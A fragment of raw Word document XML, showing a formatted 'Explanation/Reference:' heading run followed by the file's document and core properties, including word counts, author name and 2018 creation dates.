          <w:rFonts w:ascii="Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Explanation/Reference:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00AF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B1"/>
    <w:rsid w:val="004E45B1"/>
    <w:rsid w:val="00B25A81"/>
    <w:rsid w:val="00D3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B0FC1-54C6-41EE-BEE1-DE482FE3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16629</Words>
  <Characters>94789</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>789</Lines>
  <Paragraphs>222</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>111196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Alonzo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Adrian Alonzo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-23T00:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-23T00:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>